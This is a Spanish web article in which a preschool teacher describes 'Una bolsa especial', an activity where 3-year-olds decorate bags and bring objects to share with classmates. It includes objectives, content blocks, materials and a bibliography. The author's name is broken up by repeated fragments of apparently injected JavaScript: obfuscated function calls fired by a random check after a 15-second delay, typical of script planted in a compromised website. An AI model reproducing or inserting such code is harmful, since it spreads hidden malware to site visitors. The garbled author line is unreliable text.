UNA BOLSA ESPECIAL

Autora: María Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda Rodríguez Rodríguez

          En este artículo voy a exponer que actividad realizo para conocer a mis alumnos/as de 3 años de Educación Infantil, para que se conozcan entre ellos y aprendan a compartir. 

          Si yo conozco a mis alumnos/as, es decir, sus gustos, preferencias, necesidades… les podré proporcionar aquello que necesiten y lograr mejores resultados en su proceso de enseñanza – aprendizaje.


 

Desarrollo de la actividad

          Estas actividades van dirigidas a los alumnos/as del primer nivel del segundo ciclo de Educación Infantil, es decir, 3 años.

          Vamos a trabajar el área de los Lenguajes: Comunicación y Representación.

          Se encuentra relacionada con los siguientes Objetivos generales de áreas:

-         Utilizar la lengua como instrumento de comunicación, de representación, aprendizaje y disfrute, de expresión de ideas y sentimientos y valorar la lengua oral como un medio de relación con los demás y de regulación de la convivencia.

-         Acercarse al conocimiento de obras artísticas expresadas en distintos lenguajes y realizar actividades de representación y expresión artística mediante el empleo de diversas técnicas.


 

Bloques de contenidos:

 Lenguaje verbal y dentro de este bloque Escuchar, hablar y conversar. Los contenidos que vamos a trabajar son los siguientes:


-         El lenguaje verbal y las necesidades y situaciones de expresión y comunicación más habituales.

-         Reconocimiento y valoración del lenguaje oral como instrumento para comunicar los sentimientos, ideas e intereses propios y conocer los de los otros.

Lenguaje plástico. Y dentro de este bloque vamos a trabajar el siguiente contenido:

-         Producción de elaboraciones plásticas para expresar hechos, sucesos, vivencias, fantasías y deseos.

Materiales necesarios:

-         Bolsa

-         Gomets

-         Rotuladores

-         Ceras

Comienzan las actividades:

          El primer día de clase les voy a comunicar a las mamás y a los papás que el próximo día de clase deben traer sus hijos/as una bolsa de plástico. Seguidamente les expliqué en que consistía la actividad, es decir, les dije que la bolsa la vamos a utilizar para que los niños/as guarden aquellos objetos que quieran mostrar al resto de sus compañeros.

         Una vez que están todas las bolsas en el aula los alumnos/as la decoraran a su gusto: con gomets, rotuladores, plastilina, pegatinas, ceras,…

         A continuación, buscamos entre todos un lugar de la clase para colocarlas.

        Una vez decorada la bolsa se la llevaran a sus casas.

        En la asamblea les explique a mis alumnos/as que la bolsa la debían traer próximamente y en su interior contener algo que ellos/as quisieran mostrar y compartir con sus compañeros.

         Por orden de lista, en la hora de la asamblea un niño/a nos mostrará que ha traído en su bolsa.

        Estas bolsas permanecerán en el aula durante un tiempo y así puedan ser compartidas con sus compañeros/as.


 

Bibliografía:

  •  Zabalza, M.A. Didáctica de la Educación Infantil. Ed. Narcea S.A. Madrid, 1987
  •  Piaget, J. y Inchelder, B.: La psicología del niño. Editorial Morata. Madrid, 1984.
  • Lowenfeld, Víctor y Brittain, W. Desarrollo de la capacidad creadora.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.